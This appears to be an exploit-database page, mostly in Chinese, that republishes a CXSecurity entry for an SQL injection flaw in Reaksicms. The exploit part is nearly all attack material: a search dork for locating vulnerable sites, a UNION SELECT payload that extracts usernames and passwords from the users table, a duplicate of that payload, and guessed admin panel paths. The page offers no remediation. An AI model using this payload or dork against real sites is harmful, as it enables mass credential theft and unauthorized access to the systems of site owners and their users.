Powered by Reaksicms vulnerablity SQLI INJECTION - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1815960 漏洞类型
发布时间 2019-11-08 更新时间 2019-11-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110049
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# author : Mr.Rm19
# team : Bogor6etar
# email : ramdan19id@gmail.com
# dork : inurl:/agenda.html
# exploit : ' union select 1,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7c,password,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20-.html

agenda 'union select 1, (SELECT (@x) FROM (SELECT (@x: = 0x00), (SELECT (@x) FROM (users) WHERE (@x) IN (@x: = CONCAT (0x20, @ x , username, 0x7c, password, 0x3c62723e)))) x), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- % 20-.html


admin login :
/adminpanel
/adminweb
/adm1n